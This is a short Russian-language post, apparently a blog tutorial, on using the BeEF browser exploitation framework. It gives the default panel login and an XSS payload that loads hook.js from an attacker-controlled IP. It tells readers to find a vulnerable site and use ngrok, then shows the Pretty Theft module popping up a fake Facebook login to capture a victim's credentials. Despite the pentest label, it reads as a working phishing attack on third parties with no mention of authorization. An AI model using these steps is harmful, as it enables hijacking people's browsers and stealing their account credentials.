• BeEF - Browser Exploitation Framework - фреймворк эксплуатации браузеров - это мощный инструмент для работы с уязвимостями в браузерах, предназначенный для проведения пентеста.
• В этом посте рассмотрим самый базовый пример его применения.
• Так как я использую Kali Linux, процесс установки описан не будет, ведь он установлен по умолчанию.
• После запуска перейдите по адресу 127.0.0.1:3000/ui/panel. Вы можете войти в BeEF, используя имя пользователя beef и пароль beef.
• Если кому-то не очевидно, все действия производятся в локальной сети, так что для полноценной работы нужно будет либо ставить на сервер, либо можно использовать ngrok.
• Чтобы зацепить браузер жертвы, нужно, чтобы он перешел на сайт, с нужным нам js скриптом. Это может быть ваш сайт, но я покажу на примере с использованием XSS уязвимости.
• Все что нам нужно, это найти сайт с такой уязвимостью и использовать следующий пейлоад:
<script src= "http://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>
• Опять же, IP должен быть вашим, либо сервера.
• Когда вы зацепите браузер жертвы, его IP-адрес, а также значки операционной системы и типа браузера появятся на панели «Подключенные браузеры» слева.
• Если мы нажмем на подключенный браузер, он откроет интерфейс BeEF с правой стороны. Тут мы можем увидеть отпечатки браузера. Он также предоставляет нам ряд вкладок. Для наших целей нас интересует вкладка «Commands».
• В Commands есть огромное количество инструментов, можете поизучать сами, нас интересует фишинг, нажмите на Pretty Theft, тут можно выбрать, каким сайтом мы будем представляться. Выберу Facebook и нажму на Execute.
• У нашей цели появляется диалоговое окно с авторизацией через фейсбук. Если жертва введет свои данные, они отправятся к нам, и мы сможем видеть все, что ввела жертва.
• Этот пост больше для того, чтобы вы узнали про такой инструмент и изучили его сами. Удачи!